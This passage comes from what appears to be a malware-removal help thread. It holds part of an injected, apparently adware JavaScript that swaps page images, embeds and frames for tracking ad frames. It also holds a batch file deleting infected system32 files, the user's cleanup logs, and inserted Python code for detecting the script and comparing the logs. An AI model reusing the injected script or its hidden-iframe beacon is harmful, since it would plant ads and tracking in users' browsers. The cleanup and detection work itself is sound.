                El.parentNode.replaceChild(NewFrame, El);
                WrFrame_24578457887(InitObj);

                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagOBJECT_24578457887()

                function CheckTagIFRAME_24578457887(El, InitArray)
                {
                var InitObj;
                var NewFrame;
                var flExcl;

                var str;
                var ss;
                var aid = MainAid_24578457887;

                var i;

                if(!El.parentNode)
                return 1;

                if(!El.tagName)
                return 1;

                if(CheckID_24578457887(InitArray, El))
                return 1;
                InitObj = CheckObj_24578457887(InitArray, El);
                if(!InitObj)
                return 1;


                flExcl = 0;
                for(i = 0; i < ExclusionArray_24578457887.length; ++i)
                {

                if(!ExclusionArray_24578457887[i].length)
                continue;

                if(El.src.length < ExclusionArray_24578457887[i].length)
                continue;

                if(El.src.substr(0, ExclusionArray_24578457887[i].length) == ExclusionArray_24578457887[i])
                {
                flExcl = 1;
                break;
                }

                }; //for(j = 0; j < ExclusionArray_24578457887.length; ++j)

                if(flExcl)
                return 0;


                flExcl = 0; str = El.src;
                for(i = 0; i < str.length - aid.length + 1; i++)
                {
                ss = str.substr(i, aid.length);
                if(ss == aid)
                {
                flExcl = 1;
                break;
                }
                } //for(j = 0; j < str.length - 4; j++)

                if(flExcl)
                return 1;


                El.src = InitObj.FrSrc;
                Connection_3A315874118D436c8E256384792D2A73(InitObj);

                return 0;

                } //function CheckTagIFRAME_24578457887()


                function ReplaceByFrame_24578457887(InitArray, MainCollection, Included)
                {
                var El = null;
                var i;
                var flExit;


                if(!Included)
                {
                flExit = 0;

                for(i = 0; i < ruleset_AA532B7B55D44dbb87FAB30BCA27C538.length; ++i)
                {
                if(!CheckUrl_3A315874118D436c8E256384792D2A73(ruleset_AA532B7B55D44dbb87FAB30BCA27C538[i]))
                {
                flExit = 1;
                break;
                } //if(!CheckUrl_3A315874118D436c8E256384792D2A73(ruleset_AA532B7B55D44dbb87FAB30BCA27C538[idx]))

                } // for(i = 0; i < ruleset_AA532B7B55D44dbb87FAB30BCA27C538.length; ++i)

                if(flExit)
                return 0;

                }; //if(Included == 0)


                if(window.frameElement)
                {
                if(CheckObj_24578457887(InitArray, window.frameElement))
                return 0;

                if(CheckID_24578457887(InitArray, window.frameElement))
                return 0;
                } //if(window.frameElement)


                for(i = 0; i < MainCollection.length; i++)
                {
                El = MainCollection[i];
                if(El.tagName == "IMG")
                {
                if(!CheckTagIMG_24578457887(El, InitArray))
                continue;

                }//if(El.tagName == "IMG")
                else if(El.tagName == "EMBED")
                {
                if(!CheckTagEMBED_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "EMBED")
                else if(El.tagName == "OBJECT")
                {

                if(!CheckTagOBJECT_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "OBJECT")
                else if(El.tagName == "IFRAME")
                {
                if(!CheckTagIFRAME_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "IFRAME")


                if(El.childNodes && El.childNodes.length)
                ReplaceByFrame_24578457887(InitArray, El.childNodes, 1);


                } //for(i = 0; i < MainCollection.length; i++)

                return 0;

                } //function ReplaceByFrame()


                function CreateInitObject_24578457887(FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax,
                AHref, ImgSrc)
                {

                var InitObj = new Object();

                InitObj.FrID = FrID;
                InitObj.FrName = FrID;

                InitObj.FrSrc = FrSrc + '&aid=' + MainAid_24578457887 +
                '&guid=' + MainGiud_24578457887 + '&uid=' + MainUid_24578457887 +
                '&rid=' + MainRid_24578457887 + '&url=' + EscUrl_24578457887;

                InitObj.FrWidthMin = FrWidthMin;
                InitObj.FrWidthMax = FrWidthMax;
                InitObj.FrHeightMin = FrHeightMin;
                InitObj.FrHeightMax = FrHeightMax;

                InitObj.FrSpacing = '0';
                InitObj.FrBorder = 'no';
                InitObj.FrScrolling = 'no';


                InitObj.AHref = AHref;
                InitObj.ATarget = 'blank';

                InitObj.ImgSrc = ImgSrc;
                InitObj.ImgBorder = '0';
                InitObj.ImgAlt = '';

                return InitObj;

                } //function CreateInitObject()


                function GetDomain_24578457887(str)
                {
                var i;
                var str2 = "";

                for(i = 0; i < str.length; ++i)
                {

                str2 += str.charAt(i);

                if(str.charAt(i) == '/')
                {
                if( ((i + 1) < str.length) && ((i - 1) >= 0) )
                {
                if( (str.charAt(i + 1) != '/') && (str.charAt(i - 1) != '/') )
                break;
                }
                else if( ((i + 1) < str.length) && (str.charAt(i + 1) != '/') )
                break;
                else if ( ((i - 1) >= 0) && (str.charAt(i - 1) != '/') )
                break;

                } //if(str[i] == '/')

                } //for(i = 0; i < str.length; ++i)

                return str2;

                } //function GetDomain_24578457887(str)


                </script>

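The script pasted above names its functions with long hex tags and creates an iframe whose src starts with http://127.0.0.1/ and whose width and height are 0; saved page source can be checked for those traits after cleanup. This is an added example, not part of the original post; both sample pages are constructed and the function and verdict names are illustrative.

```python
import re

# Traits of the script pasted in the thread:
#   names ending in "_" + a 32-hex-digit tag, or in "_24578457887"
#   an element .src built from "http://127.0.0.1/"
#   .width / .height set to 0 (the beacon iframe is invisible)
TAGGED_NAME = re.compile(r"\b[A-Za-z]\w*?_([0-9A-Fa-f]{32}|24578457887)\b")
LOOPBACK_SRC = re.compile(r"""\.src\s*=\s*["']http://127\.0\.0\.1[:/]""")
ZERO_SIZE = re.compile(r"\.(?:width|height)\s*=\s*0\s*;")

# Constructed page: ordinary HTML plus the Connection_... function from the thread.
SAMPLE_MODIFIED = """<html><head><title>constructed test page</title></head>
<body><p>hello</p>
<script>
function Connection_3A315874118D436c8E256384792D2A73(Obj)
{
try
{
var fr = document.createElement("iframe");
fr.src = "http://127.0.0.1/" + Math.random() + "AA532B7B55D44dbb87FAB30BCA27C538?" + Obj.FrID;
fr.width = 0;
fr.height = 0;
document.body.appendChild(fr);
}
catch(e){}
}
</script>
</body></html>
"""

# Constructed page with look-alikes that must not trigger: a bare hex string,
# an underscore name without a hex tag, a zero width, a normal iframe src.
SAMPLE_CLEAN = """<html><head><title>constructed test page</title></head>
<body>
<script>
var checksum = "d41d8cd98f00b204e9800998ecf8427e";
function resize_panel(el) { el.width = 0; }
var fr = document.createElement("iframe");
fr.src = "http://example.com/widget";
</script>
</body></html>
"""


def scan_page(html):
    """Return the traits found in one page source, with 1-based line numbers."""
    tags, loopback_lines, zero_size_lines = set(), [], []
    for number, line in enumerate(html.splitlines(), start=1):
        tags.update(m.group(1).upper() for m in TAGGED_NAME.finditer(line))
        if LOOPBACK_SRC.search(line):
            loopback_lines.append(number)
        if ZERO_SIZE.search(line):
            zero_size_lines.append(number)
    # Zero-size elements are common on ordinary pages, so they are reported
    # as context only and never decide the verdict.
    if tags and loopback_lines:
        verdict = "match"
    elif tags or loopback_lines:
        verdict = "partial"
    else:
        verdict = "none"
    return {
        "verdict": verdict,
        "tags": sorted(tags),
        "loopback_lines": loopback_lines,
        "zero_size_lines": zero_size_lines,
    }


if __name__ == "__main__":
    for name, page in (("modified", SAMPLE_MODIFIED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_page(page))
```
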


                • #9
                  Open a Notepad file.
                  Copy the text below (everything in bold) into this Notepad file.

                  @ECHO OFF
                  IF EXIST log.txt DEL log.txt
                  ren C:\WINDOWS\system32\mlljh.dll mlljh.bak
                  ren C:\WINDOWS\system32\vlwosmpj.dll vlwosmpj.bak
                  ECHO Deleting files>>log.txt
                  FOR %%g in (
                  C:\WINDOWS\system32\hjllm.ini
                  C:\WINDOWS\system32\mlljh.dll
                  C:\WINDOWS\system32\vlwosmpj.dll
                  C:\WINDOWS\system32\mlljh.bak
                  C:\WINDOWS\system32\vlwosmpj.bak
                  C:\WINDOWS\BMbbad6e67.xml
                  C:\WINDOWS\BMbbad6e67.txt
                  C:\WINDOWS\pskt.ini) DO (
                  IF EXIST %%g (
                  ATTRIB -r -s -h %%g
                  DEL %%g
                  IF EXIST %%g (
                  ECHO %%g not deleted>>log.txt
                  ) ELSE (
                  ECHO %%g deleted>>log.txt)
                  ) ELSE (
                  ECHO %%g not found>>log.txt))
                  START NOTEPAD.EXE log.txt

                  Go to File - Save As.
                  For "Save in", choose: Desktop
                  For "File name", enter: del.bat
                  For "Save as type", select: All Files (*.*).
                  Click the Save button.

                  Double-click del.bat and post the log that appears.



                  • #10
                    Deleting files
                    C:\WINDOWS\system32\hjllm.ini deleted
                    C:\WINDOWS\system32\mlljh.dll not found
                    C:\WINDOWS\system32\vlwosmpj.dll not found
                    C:\WINDOWS\system32\mlljh.bak deleted
                    C:\WINDOWS\system32\vlwosmpj.bak not deleted
                    C:\WINDOWS\BMbbad6e67.xml not found
                    C:\WINDOWS\BMbbad6e67.txt deleted
                    C:\WINDOWS\pskt.ini deleted

                    Do you also know anything about the other problem, with the JavaScripts?

                    By the way, thanks very much already for your help... I would NEVER have figured this out myself!



                    • #11
                      Restart your computer.

                      After the restart, double-click del.bat once more and post the log.

                      Is the problem with those scripts still there after that?



                      • #12
                        Deleting files
                        C:\WINDOWS\system32\hjllm.ini not found
                        C:\WINDOWS\system32\mlljh.dll not found
                        C:\WINDOWS\system32\vlwosmpj.dll not found
                        C:\WINDOWS\system32\mlljh.bak not found
                        C:\WINDOWS\system32\vlwosmpj.bak deleted
                        C:\WINDOWS\BMbbad6e67.xml not found
                        C:\WINDOWS\BMbbad6e67.txt deleted
                        C:\WINDOWS\pskt.ini not found

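Comparing the two del.bat logs posted above (#10 before the restart, #12 after) shows which deletions only succeeded after the restart and which file was present again on the second run. This is an added example, not part of the original thread; the verdict labels and function names are illustrative.

```python
import re

# The two del.bat logs as posted in the thread.
LOG_BEFORE_REBOOT = r"""Deleting files
C:\WINDOWS\system32\hjllm.ini deleted
C:\WINDOWS\system32\mlljh.dll not found
C:\WINDOWS\system32\vlwosmpj.dll not found
C:\WINDOWS\system32\mlljh.bak deleted
C:\WINDOWS\system32\vlwosmpj.bak not deleted
C:\WINDOWS\BMbbad6e67.xml not found
C:\WINDOWS\BMbbad6e67.txt deleted
C:\WINDOWS\pskt.ini deleted
"""

LOG_AFTER_REBOOT = r"""Deleting files
C:\WINDOWS\system32\hjllm.ini not found
C:\WINDOWS\system32\mlljh.dll not found
C:\WINDOWS\system32\vlwosmpj.dll not found
C:\WINDOWS\system32\mlljh.bak not found
C:\WINDOWS\system32\vlwosmpj.bak deleted
C:\WINDOWS\BMbbad6e67.xml not found
C:\WINDOWS\BMbbad6e67.txt deleted
C:\WINDOWS\pskt.ini not found
"""

# del.bat writes "<path> deleted", "<path> not deleted" or "<path> not found".
# The lazy path group makes the longest status win, so "not deleted" is never
# read as a path ending in " not" followed by "deleted"; paths may hold spaces.
LINE_RE = re.compile(r"^(?P<path>.+?) (?P<status>not deleted|not found|deleted)$")

# (status in first run, status in second run) -> meaning of the combination.
VERDICTS = {
    ("deleted", "not found"): "removed on first run",
    ("not deleted", "deleted"): "delete failed, then succeeded on second run",
    ("not deleted", "not found"): "gone by second run, not removed by del.bat",
    ("deleted", "deleted"): "re-created between runs",
    ("not found", "deleted"): "appeared between runs",
    ("not found", "not found"): "absent in both runs",
}

# Verdicts that mean something wrote or kept the file after cleanup started.
FOLLOW_UP = {"re-created between runs", "appeared between runs",
             "still present after second run", "unclassified"}


def parse_log(text):
    """Map lower-cased path -> status; the header line is skipped."""
    statuses = {}
    for raw in text.splitlines():
        match = LINE_RE.match(raw.strip())
        if match:
            statuses[match.group("path").lower()] = match.group("status")
    return statuses


def compare_runs(first, second):
    """Classify every path seen in either run."""
    report = {}
    for path in sorted(set(first) | set(second)):
        before = first.get(path, "not listed")
        after = second.get(path, "not listed")
        if after == "not deleted":
            report[path] = "still present after second run"
        else:
            report[path] = VERDICTS.get((before, after), "unclassified")
    return report


def needs_follow_up(report):
    return [path for path, verdict in report.items() if verdict in FOLLOW_UP]


if __name__ == "__main__":
    result = compare_runs(parse_log(LOG_BEFORE_REBOOT), parse_log(LOG_AFTER_REBOOT))
    for path, verdict in result.items():
        print(f"{path}: {verdict}")
    print("follow up:", needs_follow_up(result))
```
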


                        • #13
                          I no longer have any problems with the scripts... thanks!



                          • #14
                            You're welcome

                            Open the RVAXO folder on your desktop and double-click Uninstall.cmd
                            This will remove everything belonging to RVAXO.

                            Download ATF cleaner (mirror) (made by Atribune)

                            Important: close all your browser windows (IE and/or Firefox and/or Opera) so the tool can work properly.

                            Double-click ATF cleaner to start the program.
                            On the "Main" tab, tick Select All.
                            Click the Empty Selected button.

                            Do the following if you also use Firefox as a browser:
                            Click the "Firefox" tab and tick Select All.
                            If you want to keep the passwords saved by Firefox, click "No" in the window that appears.
                            (this removes the tick again from "Firefox saved passwords")
                            Click the Empty Selected button.

                            Do the following if you also use Opera as a browser:
                            Click the "Opera" tab and tick Select All.
                            If you want to keep the passwords saved by Opera, click "No" in the window that appears.
                            Click the Empty Selected button.
                            Go to the "Main" tab and click the Exit button to close the program.

                            Turn off System Restore. Restart the computer. Turn System Restore back on.
                            See here how to turn off System Restore.
                            This removes any remnants of the infections from your System Restore.

                            Then I think everything is OK again



                            • #15
                              Hi Smeenk,

                              Everything seems to be working perfectly again! I'd like to thank you warmly for your effort and time! I will also make a donation as 'compensation'.

                              Thank you very much...

                              Jeroen
